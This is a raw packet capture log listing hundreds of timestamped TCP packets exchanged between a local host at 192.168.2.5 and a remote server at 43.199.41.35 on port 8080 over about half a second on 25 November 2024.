                                                                                                                                                        Nov 25, 2024 11:10:21.268243074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.268284082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.268325090 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.269125938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.269210100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.269258976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.270006895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.270052910 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.270106077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.270901918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.270941973 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.271054983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.271819115 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.271862984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.374645948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.374666929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.374730110 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.375009060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.375099897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.375149012 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.375816107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.375905991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.375946999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.376728058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.376761913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.376802921 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.377633095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.377753973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.377897024 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.378504992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.378568888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.378613949 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.379367113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.379420996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.379468918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.380165100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.405294895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.405344963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.405469894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.405666113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.405703068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.405747890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.406631947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.406685114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.406722069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.407437086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.407481909 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.407545090 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.408348083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.408394098 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.408458948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.409244061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.409285069 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.409331083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.410109997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.410145998 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.410187006 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.411004066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.411046982 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.411108971 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.411890030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.411935091 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.411979914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.412782907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.412795067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.412820101 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.432322025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.432373047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.432475090 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.432729959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.432770014 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.433049917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.433602095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.433651924 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.433917999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.434052944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.434098959 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.434794903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.434897900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.434940100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.435676098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.435810089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.435853004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.436611891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.436789989 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.436868906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.437495947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.437686920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.437731981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.438360929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.438489914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.438560009 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.439294100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.439346075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.439448118 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.440135956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.440331936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.440372944 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.441112995 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.441205025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.441242933 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.441903114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.441987991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.442033052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.442778111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.442895889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.442933083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.443650961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.443798065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.443840981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.444603920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.444674969 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.444711924 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.445441008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.445566893 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.445605040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.446367979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.446487904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.446542025 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.447201014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.447267056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.447310925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.448075056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.448240042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.448276043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.448999882 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.449111938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.449156046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.450000048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.450026989 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.450062990 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.450781107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.450875998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.450912952 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.451677084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.451761007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.451803923 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.452523947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.452629089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.452666998 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.453478098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.453509092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.453547001 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.454333067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.454483986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.454526901 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.455189943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.455322027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.455367088 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.456072092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.456154108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.456197977 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.456989050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.457125902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.457168102 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.457837105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.457966089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.458009958 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.458758116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.458872080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.458915949 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.459638119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.459748030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.459794044 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.460503101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.460612059 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.460649967 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.461393118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.461513996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.461554050 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.462331057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.462469101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.462507963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.463212013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.463274956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.463368893 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.464042902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.511003971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.566898108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.566972971 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.567076921 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.567322016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.567367077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.567413092 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.568295956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.568327904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.568492889 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.569161892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.569252014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.569360971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.569981098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.570072889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.570121050 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.570940018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.570992947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.571038961 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.571737051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.571903944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.571945906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.597436905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.597585917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.597657919 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.597811937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.597883940 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.597938061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.598819017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.598839998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.598895073 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.599656105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.599920988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.599980116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.600505114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.600667953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.600720882 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.601392031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.601485968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.601533890 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.602231026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.602348089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.602397919 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.603163004 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.603307962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.603358030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.604132891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.604207039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.604254007 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.604916096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.605110884 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.605156898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.624453068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.624582052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.624639034 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.624865055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.624922037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.624967098 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.625799894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.625849962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.626075983 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.626629114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.626761913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.626811981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.627487898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.627602100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.627645016 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.628371000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.628427982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.628470898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.629266977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.629362106 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.629417896 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.630156994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.630268097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.630320072 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.631074905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.631195068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.631249905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.631958008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.632103920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.632157087 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.632839918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.632966995 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.633033037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.633790016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.633939028 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.633995056 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.634640932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.634741068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.634788990 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.635488987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.635632038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.635679007 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.636467934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.636722088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.636787891 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.637285948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.637357950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.637406111 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.638186932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.638276100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.638326883 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.639051914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.639144897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.639197111 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.639961004 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.640055895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.640116930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.640850067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.640957117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.641011953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.641751051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.641825914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.641876936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.642589092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.642703056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.642751932 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.643462896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.643589973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.643639088 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.644474030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.644486904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:21.644532919 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:21.645275116 CET80804970543.199.41.35192.168.2.5
